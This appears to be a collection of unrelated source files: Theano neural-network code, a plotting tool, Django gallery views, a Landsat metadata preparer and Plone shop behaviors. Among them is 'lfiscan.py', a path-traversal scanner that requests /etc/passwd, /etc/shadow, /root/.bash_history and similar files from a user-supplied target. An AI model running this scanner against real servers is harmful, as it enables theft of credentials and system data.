shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]] = inputs[k][0:inputs[k].shape[0]]
input_pad[k][inputs[k].shape[0]:] = inputs[k][-1]
else:
for k in range(len(inputs)):
input_pad.append(inputs[k])
for i in range(len(inputs)):
if len(inputs) == 1 and not isinstance(self.inputVar, list):
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar.name, borrow=True))
self.input_givens[self.inputVar] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
else:
assert isinstance(self.inputVar, list)
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar[i].name, borrow=True))
self.input_givens[self.inputVar[i]] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
print("compiling compute_output() ...")
self.compute_output = theano.function(inputs=[index], outputs=self.output, givens=self.input_givens,
mode='FAST_RUN', on_unused_input='warn')
print("done")
# iterate to save memory
n_test_batches = padSize / batch_size
start = time.time()
for i in range(n_test_batches):
# pad last batch to batch size
if i == n_test_batches-1:
input_pad = []
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]-i*batch_size] = inputs[k][i*batch_size:]
input_pad[k][inputs[k].shape[0]-i*batch_size:] = inputs[k][-1]
for k in range(len(inputs)):
self.input_data[k].set_value(input_pad[k], borrow=True)
else:
for k in range(len(inputs)):
self.input_data[k].set_value(inputs[k][i * batch_size:(i + 1) * batch_size], borrow=True)
o = self.compute_output(0)
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k][i * batch_size:(i + 1) * batch_size] = o[k]
else:
out[0][i * batch_size:(i + 1) * batch_size] = o.reshape(self.cfgParams.outputDim)
end = time.time()
if timeit:
print("{} in {}s, {}ms per frame".format(padSize, end - start, (end - start)*1000./padSize))
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k] = out[k][0:nSamp]
return out
else:
return out[0][0:nSamp]
def enableDropout(self):
"""
Enables dropout in all dropout layers, ie for training
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.enableDropout()
def disableDropout(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.disableDropout()
def dropoutEnabled(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
if layer.dropoutEnabled():
return True
return False
def hasDropout(self):
"""
Checks if network has dropout layers
:return: True if there are dropout layers
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
return True
return False
@property
def weightVals(self):
"""
Returns list of the weight values
:return: list of weight values
"""
return self.recGetWeightVals(self.params)
@weightVals.setter
def weightVals(self, value):
"""
Set weights with given values
:param value: values for weights
:return: None
"""
self.recSetWeightVals(self.params, value)
def recSetWeightVals(self, param, value):
"""
Set weights with given values
:param param: layer parameters listing the layers weights
:param value: values for weights
:return: None
"""
if isinstance(value, list):
assert isinstance(param, list), "tried to assign a list of weights to params, which is not a list {}".format(type(param))
assert len(param) == len(value), "tried to assign unequal list of weights {} != {}".format(len(param), len(value))
for i in xrange(len(value)):
self.recSetWeightVals(param[i], value[i])
else:
param.set_value(value)
def recGetWeightVals(self, param):
"""
Returns list of the weight values
:param param: layer parameters listing the layers weights
:return: list of weight values
"""
w = []
if isinstance(param, list):
for p in param:
w.append(self.recGetWeightVals(p))
else:
w = param.get_value()
return w
def save(self, filename):
"""
Save the state of this network to a pickle file on disk.
:param filename: Save the parameters of this network to a pickle file at the named path. If this name ends in
".gz" then the output will automatically be gzipped; otherwise the output will be a "raw" pickle.
:return: None
"""
state = dict([('class', self.__class__.__name__), ('network', self.__str__())])
for layer in self.layers:
key = '{}-values'.format(layer.layerNum)
state[key] = [p.get_value() for p in layer.params]
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'wb')
cPickle.dump(state, handle, -1)
handle.close()
print 'Saved model parameter to {}'.format(filename)
def load(self, filename):
"""
Load the parameters for this network from disk.
:param filename: Load the parameters of this network from a pickle file at the named path. If this name ends in
".gz" then the input will automatically be gunzipped; otherwise the input will be treated as a "raw" pickle.
:return: None
"""
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'rb')
saved = cPickle.load(handle)
handle.close()
if saved['network'] != self.__str__():
print "Possibly not matching network configuration!"
differences = list(difflib.Differ().compare(saved['network'].splitlines(), self.__str__().splitlines()))
print "Differences are:"
print "\n".join(differences)
for layer in self.layers:
if len(layer.params) != len(saved['{}-values'.format(layer.layerNum)]):
print "Warning: Layer parameters for layer {} do not match. Trying to fit on shape!".format(layer.layerNum)
n_assigned = 0
for p in layer.params:
for v in saved['{}-values'.format(layer.layerNum)]:
if p.get_value().shape == v.shape:
p.set_value(v)
n_assigned += 1
if n_assigned != len(layer.params):
raise ImportError("Could not load all necessary variables!")
else:
print "Found fitting parameters!"
else:
prms = layer.params
for p, v in zip(prms, saved['{}-values'.format(layer.layerNum)]):
if p.get_value().shape == v.shape:
p.set_value(v)
else:
print "WARNING: Skipping parameter for {}! Shape {} does not fit {}.".format(p.name, p.get_value().shape, v.shape)
print 'Loaded model parameters from {}'.format(filename) | gpl-3.0 | -8,016,346,717,327,464,000 | 37.740406 | 150 | 0.569489 | false |
per9000/naiveplot | src/nplot.py | 1 | 5073 | #!/usr/bin/python
from argparse import ArgumentParser
from sys import stdin
from string import ascii_uppercase
from naiveplot import NaivePlot, Curve, Point, Line
class NaiveParserPlotter:
"""Class for reading and plotting"""
def __init__(self):
"""Setup place holders"""
self.args = None
self.points = None
self.lines = None
self.colors = None
self.plot = None
return
def setup(self):
"""Do all setup after parsing args"""
self.get_handle()
self.setup_formats()
return
def get_handle(self):
"""Get a handle to read from"""
if self.args.std_in:
self.handle = stdin
elif self.args.in_file:
self.handle = open(self.args.in_file, 'r')
else:
pass # TODO: exception?
return
def setup_formats(self):
"""Return format vectors"""
self.points = list(ascii_uppercase)
self.lines = ['.', '-', ':', '~', "'"]
self.colors = ['blue', 'red', 'green', 'yellow', 'magenta', 'cyan',
'grey'] #'white'
return
def get_format(self, idx):
"""get approproate combo"""
attrs = list()
for container in [self.points, self.lines, self.colors]:
attrs.append(container[idx%len(container)])
return tuple(attrs)
def parse_args(self, args=None):
"""Parse the arguments"""
parser = ArgumentParser(description="Plot the numbers given in a file "
"or in stdin")
rgroup = parser.add_argument_group("Read from...")
rgroup.add_argument('--std-in', action="store_true", default=False,
help="Perform doc tests and exit instead.")
rgroup.add_argument('--in-file', '-f', type=str, default=None,
help="Specify input file path.")
dgroup = parser.add_argument_group("Input data...")
dgroup.add_argument('--xy', '-x', action="store_true", default=False,
help="Treat first column as x values, and the "
"following as y-values (default False).")
dgroup.add_argument('--col', '-c', action="append", dest='cols',
type=int, default=list(),
help="Specify which columns to investigate. "
"Repeat if needed. Default: All")
dgroup.add_argument('--ignore-first', '-i', action="store_true",
default=False, help="ignore first line")
dgroup.add_argument('--sep', '-s', default=' ',
help="Specify separator, default: space")
fgroup = parser.add_argument_group("Formatting...")
fgroup.add_argument('--gap', '-g', type=float, default=0.01,
help="inverted number of subpoints in lines")
fgroup.add_argument('--not-implemented')
if args:
self.args = parser.parse_args(args)
else:
self.args = parser.parse_args()
return
def process(self):
"""Do the real work"""
ctr = 0
olds = None
pcontainer = list()
self.plot = NaivePlot(xmin=-0.1, ymin=-0.1)
for line in self.handle:
ctr += 1
if ctr == 1 and self.args.ignore_first:
continue
values = [float(val.strip()) for val in \
line.strip().split(self.args.sep) if val]
x = float(ctr)
if self.args.xy:
x = float(values[0])
points = [Point(x, val) for val in values if x and val]
pcontainer.append(points)
if olds:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
if not olds[i] or not points[i]:
continue
l = Line(olds[i], points[i])
(_, lchar, lcol) = self.get_format(i)
self.plot.add_curve(Curve(l, 0.0, 1.0, self.args.gap),
lchar, lcol)
olds = points
(xmin, xmax, ymin, ymax) = (0, 0, 0, 0)
for points in pcontainer:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
(pchar, _, pcol) = self.get_format(i)
self.plot.add_curve(points[i], pchar, pcol)
xmin = min(xmin, points[i].x)
xmax = max(xmax, points[i].x)
ymin = min(ymin, points[i].y)
ymax = max(ymax, points[i].y)
self.plot.zoom(xmin, xmax, ymin, ymax)
return
def __str__(self):
"""just print"""
return str(self.plot)
if __name__ == "__main__":
npp = NaiveParserPlotter()
npp.parse_args()
npp.setup()
npp.process()
print npp
| gpl-3.0 | -1,404,144,900,113,913,000 | 32.156863 | 79 | 0.500099 | false |
cpodlesny/lisbon | src/gallery/views.py | 1 | 7355 | from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.urlresolvers import reverse
from django.shortcuts import render, redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from helpers.models import Helpers
from offer.models import OfferCategory
from tours.models import Category
from .forms import GalleryForm
from .models import Gallery
def get_lang(request):
lang = request.LANGUAGE_CODE
return lang
def get_company():
return Helpers.objects.get(id=1).company_name
def gallery_list(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
queryset_list = Gallery.objects.all()
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '#', 'name': _('Gallery'), 'active': True}
]
paginator = Paginator(queryset_list, 6)
page_request_var = 'page'
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
queryset = paginator.page(1)
except EmptyPage:
queryset = paginator.page(paginator.num_pages)
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery'),
'breadcrumbs': breadcrumbs,
'object_list': queryset,
'page_request_var': page_request_var,
}
return render(request, 'partials/gallery.html', context)
def gallery_detail(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
gallery = Gallery.objects.get(pk=pk)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
gallery_description = {
'pt': gallery.description_PT,
'en': gallery.description_EN,
'de': gallery.description_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
gallery_current = {
'title': gallery_title[lang],
'description': gallery_description[lang],
'id': gallery.id,
'video': gallery.video,
'img': gallery.img,
'img1': gallery.img_1,
'img2': gallery.img_2,
'img3': gallery.img_3,
}
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'breadcrumbs': breadcrumbs,
'title': gallery_title[lang],
'object': gallery_current,
}
return render(request, 'templates/_gallery_details.html', context)
def gallery_update(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
gallery = get_object_or_404(Gallery, pk=pk)
lang = get_lang(request)
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
form = GalleryForm(request.POST or None, request.FILES or None, instance=gallery)
if form.is_valid():
gallery = form.save(commit=False)
gallery.save()
messages.success(request, _('Gallery edited'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery edit'),
'breadcrumbs': breadcrumbs,
'instance': gallery,
'form': form,
'value': _('Add'),
}
return render(request, 'templates/_form.html', context)
def gallery_create(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
form = GalleryForm(request.POST or None, request.FILES or None)
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': _('Create Gallery'), 'active': True}
]
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
messages.success(request, _('Gallery created'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Create Gallery'),
'breadcrumbs': breadcrumbs,
'value': _('Add'),
'form': form
}
return render(request, 'templates/_form.html', context)
def gallery_delete(request, pk=None):
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
instance = get_object_or_404(Gallery, pk=pk)
instance.delete()
messages.success(request, _('Gallery deleted'))
return redirect('gallery:list')
| mit | 9,215,973,351,278,447,000 | 31.982063 | 89 | 0.55758 | false |
ceos-seo/Data_Cube_v2 | agdc-v2/utils/usgslsprepare.py | 1 | 8328 | # coding=utf-8
"""
Ingest data from the command-line.
"""
from __future__ import absolute_import, division
import logging
import uuid
from xml.etree import ElementTree
import re
from pathlib import Path
import yaml
from dateutil import parser
from datetime import timedelta
import rasterio.warp
import click
from osgeo import osr
import os
# image boundary imports
import rasterio
from rasterio.errors import RasterioIOError
import rasterio.features
import shapely.affinity
import shapely.geometry
import shapely.ops
_STATIONS = {'023': 'TKSC', '022': 'SGS', '010': 'GNC', '011': 'HOA',
'012': 'HEOC', '013': 'IKR', '014': 'KIS', '015': 'LGS',
'016': 'MGR', '017': 'MOR', '032': 'LGN', '019': 'MTI', '030': 'KHC',
'031': 'MLK', '018': 'MPS', '003': 'BJC', '002': 'ASN', '001': 'AGS',
'007': 'DKI', '006': 'CUB', '005': 'CHM', '004': 'BKT', '009': 'GLC',
'008': 'EDC', '029': 'JSA', '028': 'COA', '021': 'PFS', '020': 'PAC'}
###IMAGE BOUNDARY CODE
def safe_valid_region(images, mask_value=None):
try:
return valid_region(images, mask_value)
except (OSError, RasterioIOError):
return None
def valid_region(images, mask_value=None):
mask = None
for fname in images:
## ensure formats match
with rasterio.open(str(fname), 'r') as ds:
transform = ds.affine
img = ds.read(1)
if mask_value is not None:
new_mask = img & mask_value == mask_value
else:
new_mask = img != ds.nodata
if mask is None:
mask = new_mask
else:
mask |= new_mask
shapes = rasterio.features.shapes(mask.astype('uint8'), mask=mask)
shape = shapely.ops.unary_union([shapely.geometry.shape(shape) for shape, val in shapes if val == 1])
# convex hull
geom = shape.convex_hull
# buffer by 1 pixel
geom = geom.buffer(1, join_style=3, cap_style=3)
# simplify with 1 pixel radius
geom = geom.simplify(1)
# intersect with image bounding box
geom = geom.intersection(shapely.geometry.box(0, 0, mask.shape[1], mask.shape[0]))
# transform from pixel space into CRS space
geom = shapely.affinity.affine_transform(geom, (transform.a, transform.b, transform.d,
transform.e, transform.xoff, transform.yoff))
output = shapely.geometry.mapping(geom)
output['coordinates'] = _to_lists(output['coordinates'])
return output
def _to_lists(x):
"""
Returns lists of lists when given tuples of tuples
"""
if isinstance(x, tuple):
return [_to_lists(el) for el in x]
return x
###END IMAGE BOUNDARY CODE
def band_name(path):
name = path.stem
position = name.find('_')
if position == -1:
raise ValueError('Unexpected tif image in eods: %r' % path)
if re.match(r"[Bb]\d+", name[position+1:]):
layername = name[position+2:]
else:
layername = name[position+1:]
return layername
def get_projection(path):
with rasterio.open(str(path)) as img:
left, bottom, right, top = img.bounds
return {
'spatial_reference': str(str(getattr(img, 'crs_wkt', None) or img.crs.wkt)),
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
}
}
def get_coords(geo_ref_points, spatial_ref):
spatial_ref = osr.SpatialReference(spatial_ref)
t = osr.CoordinateTransformation(spatial_ref, spatial_ref.CloneGeogCS())
def transform(p):
lon, lat, z = t.TransformPoint(p['x'], p['y'])
return {'lon': lon, 'lat': lat}
return {key: transform(p) for key, p in geo_ref_points.items()}
def populate_coord(doc):
proj = doc['grid_spatial']['projection']
doc['extent']['coord'] = get_coords(proj['geo_ref_points'], proj['spatial_reference'])
def crazy_parse(timestr):
try:
return parser.parse(timestr)
except ValueError:
if not timestr[-2:] == "60":
raise
return parser.parse(timestr[:-2]+'00') + timedelta(minutes=1)
def prep_dataset(fields, path):
images_list = []
for file in os.listdir(str(path)):
if file.endswith(".xml") and (not file.endswith('aux.xml')):
metafile = file
if file.endswith(".tif") and ("band" in file) :
images_list.append(os.path.join(str(path),file))
with open(os.path.join(str(path), metafile)) as f:
xmlstring = f.read()
xmlstring = re.sub(r'\sxmlns="[^"]+"', '', xmlstring, count=1)
doc = ElementTree.fromstring(xmlstring)
satellite = doc.find('.//satellite').text
instrument = doc.find('.//instrument').text
acquisition_date = doc.find('.//acquisition_date').text.replace("-", "")
scene_center_time = doc.find('.//scene_center_time').text[:8]
center_dt = crazy_parse(acquisition_date + "T" + scene_center_time)
aos = crazy_parse(acquisition_date + "T" + scene_center_time) - timedelta(seconds=(24 / 2))
los = aos + timedelta(seconds=24)
lpgs_metadata_file = doc.find('.//lpgs_metadata_file').text
groundstation = lpgs_metadata_file[16:19]
fields.update({'instrument': instrument, 'satellite': satellite})
start_time = aos
end_time = los
images = {band_name(im_path): {
'path': str(im_path.relative_to(path))
} for im_path in path.glob('*.tif')}
projdict = get_projection(path/next(iter(images.values()))['path'])
projdict['valid_data'] = safe_valid_region(images_list)
doc = {
'id': str(uuid.uuid4()),
'processing_level': fields["level"],
'product_type': fields["type"],
'creation_dt': fields["creation_dt"],
'platform': {'code': fields["satellite"]},
'instrument': {'name': fields["instrument"]},
'acquisition': {
'groundstation': {
'name': groundstation,
'aos': str(aos),
'los': str(los)
}
},
'extent': {
'from_dt': str(start_time),
'to_dt': str(end_time),
'center_dt': str(center_dt)
},
'format': {'name': 'GeoTiff'},
'grid_spatial': {
'projection': projdict
},
'image': {
'satellite_ref_point_start': {'path': int(fields["path"]), 'row': int(fields["row"])},
'satellite_ref_point_end': {'path': int(fields["path"]), 'row': int(fields["row"])},
'bands': images
},
'lineage': {'source_datasets': {}}
}
populate_coord(doc)
return doc
def dataset_folder(fields):
fmt_str = "{vehicle}_{instrument}_{type}_{level}_GA{type}{product}-{groundstation}_{path}_{row}_{date}"
return fmt_str.format(**fields)
def prepare_datasets(nbar_path):
fields = re.match(
(
r"(?P<code>LC8|LE7|LT5)"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"(?P<productyear>[0-9]{4})"
r"(?P<julianday>[0-9]{3})"
), nbar_path.stem).groupdict()
timedelta(days=int(fields["julianday"]))
fields.update({'level': 'sr_refl',
'type': 'LEDAPS',
'creation_dt': ((crazy_parse(fields["productyear"]+'0101T00:00:00'))+timedelta(days=int(fields["julianday"])))})
nbar = prep_dataset(fields, nbar_path)
return (nbar, nbar_path)
@click.command(help="Prepare USGS LS dataset for ingestion into the Data Cube.")
@click.argument('datasets',
type=click.Path(exists=True, readable=True, writable=True),
nargs=-1)
def main(datasets):
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
for dataset in datasets:
path = Path(dataset)
logging.info("Processing %s", path)
documents = prepare_datasets(path)
dataset, folder = documents
yaml_path = str(folder.joinpath('agdc-metadata.yaml'))
logging.info("Writing %s", yaml_path)
with open(yaml_path, 'w') as stream:
yaml.dump(dataset, stream)
if __name__ == "__main__":
main()
| apache-2.0 | 6,611,207,923,284,716,000 | 30.908046 | 131 | 0.570725 | false |
3t1n/scripts | Python/LFI-Scan/lfiscan.py | 1 | 1102 | #!/usr/bin/env python
#coding: utf-8
#coded by et1m
__author__ = "et1m"
print' _ ______ _____ _____ _____ _ _ '
print'| | | ____|_ _| / ____|/ ____| /\ | \ | |'
print'| | | |__ | | | (___ | | / \ | \| |'
print'| | | __| | | \___ \| | / /\ \ | . ` |'
print'| |____| | _| |_ ____) | |____ / ____ \| |\ |'
print'|______|_| |_____| |_____/ \_____/_/ \_\_| \_|'
print ''
print ''
import requests
import webbrowser
print 'Use em servidores que rodam Linux'
alvo = raw_input("digite seu alvo: ")
print''
cd = raw_input("digite os ../ : " )
print ''
print("Você digitou: " + alvo + cd)
print ''
paginas = ['/etc/passwd','/etc/issue','/proc/version','/etc/profile','/etc/shadow','/root/.bash_history','/var/log/dmessage','/var/mail/root','/var/spool/cron/crontabs/root']
for x in paginas:
check = requests.get(alvo + cd + x)
if check.status_code == 200: #se o get der certo então abre o browser com o url completo
webbrowser.open(alvo + cd + x)
| cc0-1.0 | 2,690,219,767,311,702,000 | 31.352941 | 174 | 0.427273 | false |
andreesg/bda.plone.shop | src/bda/plone/shop/dx.py | 1 | 14904 | # -*- coding: utf-8 -*-
from bda.plone.cart import CartItemDataProviderBase
from bda.plone.cart import CartItemPreviewAdapterBase
from bda.plone.cart.interfaces import ICartItemStock
from bda.plone.orders.interfaces import IBuyable
from bda.plone.orders.interfaces import ITrading
from bda.plone.shipping.interfaces import IShippingItem
from bda.plone.shop import message_factory as _
from bda.plone.shop.interfaces import IBuyablePeriod
from bda.plone.shop.mailnotify import BubbleGlobalNotificationText
from bda.plone.shop.mailnotify import BubbleItemNotificationText
from bda.plone.shop.utils import get_shop_article_settings
from bda.plone.shop.utils import get_shop_settings
from bda.plone.shop.utils import get_shop_shipping_settings
from bda.plone.shop.utils import get_shop_tax_settings
from plone.autoform.interfaces import IFormFieldProvider
from plone.dexterity.interfaces import IDexterityContent
from plone.supermodel import model
from zope import schema
from zope.component import adapter
from zope.component import getUtility
from zope.interface import implementer
from zope.interface import provider
from zope.schema.interfaces import IContextAwareDefaultFactory
from zope.schema.interfaces import IVocabularyFactory
@provider(IContextAwareDefaultFactory)
def default_item_net(context):
return get_shop_article_settings().default_item_net
@provider(IContextAwareDefaultFactory)
def default_item_vat(context):
return get_shop_tax_settings().default_item_vat
@provider(IContextAwareDefaultFactory)
def default_item_display_gross(context):
return get_shop_settings().default_item_display_gross
@provider(IContextAwareDefaultFactory)
def item_comment_enabled(context):
return get_shop_article_settings().default_item_comment_enabled
@provider(IContextAwareDefaultFactory)
def default_item_comment_required(context):
return get_shop_article_settings().default_item_comment_required
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit_float(context):
return get_shop_article_settings().default_item_quantity_unit_float
@provider(IContextAwareDefaultFactory)
def default_item_cart_count_limit(context):
return get_shop_article_settings().default_item_cart_count_limit
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit(context):
return get_shop_article_settings().default_item_quantity_unit
@provider(IFormFieldProvider)
class IBuyableBehavior(model.Schema, IBuyable):
"""Buyable behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_net',
'item_vat',
'item_cart_count_limit',
'item_display_gross',
'item_comment_enabled',
'item_comment_required',
'item_quantity_unit_float',
'item_quantity_unit'
]
)
item_net = schema.Float(
title=_(u'label_item_net', default=u'Item net price'),
required=False,
defaultFactory=default_item_net
)
item_vat = schema.Choice(
title=_(u'label_item_vat', default=u'Item VAT (in %)'),
vocabulary='bda.plone.shop.vocabularies.VatVocabulary',
required=False,
defaultFactory=default_item_vat
)
item_cart_count_limit = schema.Float(
title=_(u'label_item_cart_count_limit',
default=u'Max count of this item in cart'),
required=False,
defaultFactory=default_item_cart_count_limit
)
item_display_gross = schema.Bool(
title=_(u'label_item_display_gross', default=u'Display Gross Price'),
description=_(u'help_item_display_gross',
default=u'Show price with taxes included'),
required=False,
defaultFactory=default_item_display_gross
)
item_comment_enabled = schema.Bool(
title=_(u'label_item_comment_enabled', default='Comment enabled'),
required=False,
defaultFactory=item_comment_enabled
)
item_comment_required = schema.Bool(
title=_(u'label_item_comment_required', default='Comment required'),
required=False,
defaultFactory=default_item_comment_required
)
item_quantity_unit_float = schema.Bool(
title=_(
u'label_item_quantity_unit_float', default='Quantity as float'),
required=False,
defaultFactory=default_item_quantity_unit_float
)
item_quantity_unit = schema.Choice(
title=_(u'label_item_quantity_unit', default='Quantity unit'),
vocabulary='bda.plone.shop.vocabularies.QuantityUnitVocabulary',
required=False,
defaultFactory=default_item_quantity_unit
)
@adapter(IBuyableBehavior)
class DXCartItemDataProvider(CartItemDataProviderBase):
"""Accessor Interface
"""
@property
def net(self):
val = self.context.item_net
if not val:
return 0.0
return float(val)
@property
def vat(self):
val = self.context.item_vat
if not val:
return 0.0
return float(val)
@property
def cart_count_limit(self):
return self.context.item_cart_count_limit
@property
def display_gross(self):
return self.context.item_display_gross
@property
def comment_enabled(self):
return self.context.item_comment_enabled
@property
def comment_required(self):
return self.context.item_comment_required
@property
def quantity_unit_float(self):
return self.context.item_quantity_unit_float
@property
def quantity_unit(self):
unit = self.context.item_quantity_unit
vocab = getUtility(
IVocabularyFactory,
'bda.plone.shop.vocabularies.QuantityUnitVocabulary')(self.context)
for term in vocab:
if unit == term.value:
return term.title
@provider(IContextAwareDefaultFactory)
def default_item_display_stock(context):
return True
@provider(IContextAwareDefaultFactory)
def default_item_stock_warning_threshold(context):
return get_shop_article_settings().default_item_stock_warning_threshold
@provider(IFormFieldProvider)
class IStockBehavior(model.Schema):
"""Stock behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_display_stock',
'item_available',
'item_overbook',
'item_stock_warning_threshold'
]
)
item_display_stock = schema.Bool(
title=_(u'label_item_display_stock', default=u'Display item stock'),
required=False,
defaultFactory=default_item_display_stock
)
item_available = schema.Float(
title=_(u'label_item_available', default=u'Item stock available'),
required=False
)
item_overbook = schema.Float(
title=_(u'label_item_overbook', default=u'Item stock overbook'),
required=False
)
item_stock_warning_threshold = schema.Float(
title=_(u'label_item_stock_warning_threshold',
default=u'Item stock warning threshold.'),
required=False,
defaultFactory=default_item_stock_warning_threshold
)
@implementer(ICartItemStock)
@adapter(IStockBehavior)
class DXCartItemStock(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def display(self):
return self.context.item_display_stock
@property
def available(self):
return self.context.item_available
@available.setter
def available(self, value):
self.context.item_available = value
@property
def overbook(self):
return self.context.item_overbook
@overbook.setter
def overbook(self, value):
self.context.item_overbook = value
@property
def stock_warning_threshold(self):
return self.context.item_stock_warning_threshold
@stock_warning_threshold.setter
def stock_warning_threshold(self, value):
self.context.item_stock_warning_threshold = value
@provider(IContextAwareDefaultFactory)
def default_shipping_item_shippable(context):
return get_shop_shipping_settings().default_shipping_item_shippable
@provider(IFormFieldProvider)
class IShippingBehavior(model.Schema):
"""Shipping behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'shipping_item_shippable',
'shipping_item_weight',
'shipping_item_free_shipping'
]
)
shipping_item_shippable = schema.Bool(
title=_(u'label_shipping_item_shippable', default=u'Item Shippable'),
description=_('help_shipping_item_shippable',
default=u'Flag whether item is shippable, i.e. '
u'downloads are not'),
defaultFactory=default_shipping_item_shippable
)
shipping_item_weight = schema.Float(
title=_(u'label_shipping_item_weight', default=u'Item Weight'),
required=False
)
shipping_item_free_shipping = schema.Bool(
title=_(u'label_shipping_item_free_shipping',
default=u'Free Shipping'),
description=_('help_shipping_item_free_shipping',
default=u'Flag whether shipping of this item is free.')
)
@implementer(IShippingItem)
@adapter(IShippingBehavior)
class DXShippingItem(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def shippable(self):
return self.context.shipping_item_shippable
@property
def weight(self):
return self.context.shipping_item_weight
@property
def free_shipping(self):
return self.context.shipping_item_free_shipping
@adapter(IDexterityContent)
class DXCartItemPreviewImage(CartItemPreviewAdapterBase):
"""Accessor Interface
"""
preview_scale = "tile"
@property
def url(self):
"""Get url of preview image by trying to read the 'image' field on the
context.
"""
img_scale = None
if hasattr(self.context, 'image'):
scales = self.context.restrictedTraverse('@@images')
img_scale = scales.scale("image", scale=self.preview_scale)
return img_scale and img_scale.url or ""
@provider(IFormFieldProvider)
class IItemNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'order_text',
'overbook_text'])
order_text = schema.Text(
title=_(
u"label_item_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail"
),
required=False
)
overbook_text = schema.Text(
title=_(
u"label_item_overbook_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail if item is out of stock"
),
required=False
)
@provider(IFormFieldProvider)
class IGlobalNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'global_order_text',
'global_overbook_text'])
global_order_text = schema.Text(
title=_(
u"label_item_global_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item"
),
required=False
)
